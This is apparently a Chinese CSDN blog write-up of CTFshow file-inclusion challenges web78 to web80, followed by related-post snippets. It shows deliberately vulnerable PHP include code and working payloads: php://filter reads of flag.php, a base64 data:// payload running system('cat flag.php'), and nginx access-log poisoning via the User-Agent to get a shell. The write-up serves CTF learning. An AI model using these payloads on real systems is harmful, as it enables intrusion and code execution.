web入门-文件包含

最新推荐文章于 2024-06-01 12:50:49 发布
最新推荐文章于 2024-06-01 12:50:49 发布
阅读量3.2k 收藏 5
点赞数 2
分类专栏: 刷题记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wo41ge/article/details/109948000
版权

目录

web78~php伪协议

 <?php

if(isset($_GET['file'])){
   
    $file = $_GET['file'];
    include($file);
}else{
   
    highlight_file(__FILE__);
}

直接payload

?file=php://filter/read=convert.base64-encode/resource=flag.php

web79~Data协议

<?php

if(isset($_GET['file'])){
   
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
   
    highlight_file(__FILE__);
}

过滤了 php ,所以不能用 php 开头的伪协议了。

可以使用 data协议

具体 可以看这里

在这里插入图片描述

payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=

# PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php');

还是要base64编码

web80~包含日志文件

<?php

if(isset($_GET['file'])){
   
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
   
    highlight_file(__FILE__);
}

过滤了 php、data ,也就是 php 伪协议、data 协议。

在这里插入图片描述

可以包含日志文件getshell

payload:

包含日志文件 进行getshell

日志文件路径:?file=/var/log/nginx/access.log

在这里插入图片描述

抓包修改UA 进行日志包含
在这里插入图片描述

看到了fl0g.php 进行访问就可

最低0.47元/天 解锁文章
每天都要努力哇
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTFshow web 文件包含
m0_56993542的博客
10-18 385
web 78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 文件包含伪协议,没有过滤。 ?file=php://filter/read=convert.base64-encode/resource=flag.php 拿到flag的base64编码,直接去解码。 web 79 if(isset($_GET['file'])){
CTFshow web入门——文件包含
小元砸的博客
02-07 3446
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
【CTF Web】BUUCTF BUU LFI COURSE 1 Writeup(代码审计+PHP+文件包含漏洞)
最新发布
HEX9CF的技术博客
06-01 583
1点击启动靶机。
ctfshow文件包含-超详解
qq_50589021的博客
08-05 1924
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
ctfshow web入门 文件包含
Lum1n0us's Blog
02-03 856
文章目录web78web79web80-81web82-86web87web88web116web117参考链接 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 第一题是最基础的文件包含,直接上payload payload: ?file=php://filter/convert.base64-enco
ctfshow-web79(文件包含)
m0_62094846的博客
01-11 564
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); } 过滤了php,如果用上题的php://file怎么都解不开,可以使用data ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQg.
Bugku——welcome to bugkuctf(一道练习php://filter和php://input的好题)
csu_vc的博客
10-28 9357
查看源码有提示<!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){ echo "hello admin!<br>";
web--bootstrap入门基础笔记
09-26
这个"web--bootstrap入门基础笔记"是专科计算机软件设计专业大二学生在一个月内通过32节90分钟课程学习的总结,适用于从零开始学习的初学者,同时也为有一定经验的开发者提供参考。 首先,Bootstrap的核心概念是...
Web安全入门-task2(upload-labs1-10)
10-21
Web安全入门-task2(upload-labs1-10) 本资源主要讲解了Web安全入门的基础知识,通过Upload Labs的1-10实验,...该资源涵盖了Web安全入门的多个方面,包括文件上传限制绕过、黑名单检测、文件上传绕过技术和PHP函数等。
WebApi入门到精通-WebApi列表
03-30
WebApi入门到精通-WebApi列表】 在IT行业中,Web API是构建RESTful服务的重要工具,特别是对于那些需要提供HTTP服务的后端开发者来说。本教程“WebApi入门到精通-WebApi列表”旨在帮助初学者理解并掌握ASP.NET ...
web3-react-scaffold:用于使用 Ether.js 和 Web3-React 构建 React 去中心化应用程序 (DApp) 的入门套件
08-03
Web3 React脚手架该存储库包含使用ether.js 、 web3-react和react开始创建 Web3 应用程序(又名去中心化应用程序,DApp)的ether.js 。 默认情况下,脚手架设置为使用 MetaMask 作为注入的 Web3 提供程序。 但是,这...
基于框架的Web开发-Mybatis入门.doc
07-04
- `mappers`包:存放SQL映射文件,每个映射文件包含一个Java接口和对应的XML配置文件。 - 测试包:包含一个测试类,用于验证MyBatis的正确配置和功能。 - `mybatis-config.xml`:MyBatis的核心配置文件。 - `log4j....
ctfshow-文件包含
m0_74456293的博客
03-27 532
ctfshow-文件包含
CTFshow刷题日记-WEB-文件包含
Love&Share
09-04 4169
文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型 直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");
ctfshow文件包含
Vincent0sen的博客
11-13 1185
解法一 - php://input解法二 - data://
【从0开始学web】78-88 文件包含
yzl_007的博客
10-14 3518
【从0开始学web】78-88 文件包含 文件包含题,可以先了解一下文件包含漏洞 https://blog.csdn.net/yzl_007/article/details/120261435 web78 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 10:52:43 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 10:54:2
文件包含漏洞靶场练习
ximo的博客
02-13 1652
目录Lfi-Labs说明LFI-1LFI-2LFI-3LFI-4LFI-5ctfshowweb 78web 79web 80-81web 82-86web 87web 88 Lfi-Labs 说明 该环境为phpstudy搭建,在网站根目录下存在phpinfo.php;以此为例。 LFI-1 源码: <?php include($_GET["page"]); ?> payload: ?page=phpinfo.php 发现并没用成功,使用 ../ 返回上一级目录 LFI-2 源码: &lt
2016xctf一道ctf题目
热门推荐
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
ctf题php反序列化,从一道CTF题中学习php反序列化与伪协议
weixin_39927214的博客
04-01 1784
之前一直有想写关于反序列化的东西,可是一直拖拖拖,拖到了现在。本文尝试从ZJCTF2019中的例题来了解何为php反序列,以及php伪协议。原题:逆转思维1234567891011121314151617181920$text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&am...
ctfshow web入门文件包含
05-24
我不确定你在问什么,但如果你是在问CTF中的Web入门题目,它可能包含以下内容: 1. 源代码:包含了网站的HTML、CSS和JavaScript代码,以及后端服务器脚本代码。 2. Robots.txt文件:该文件包含网站的爬虫指令,告诉爬虫哪些页面可以被访问,哪些不可以。 3. .htaccess文件:该文件包含了一些服务器配置信息,比如重定向和安全设置等。 4. 网站地图:该文件列出了网站的所有页面和链接,以便搜索引擎和用户能够更好地浏览网站。 5. Cookie:一些Web题目可能需要你使用cookie来获取敏感信息或者进行认证。 6. SQL注入:一些Web题目可能需要你使用SQL注入来获取敏感信息或者执行恶意代码。 7. 文件上传:一些Web题目可能需要你上传恶意文件来获取敏感信息或者执行恶意代码。 这只是一些可能的内容,不同的Web题目会有不同的挑战和难度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值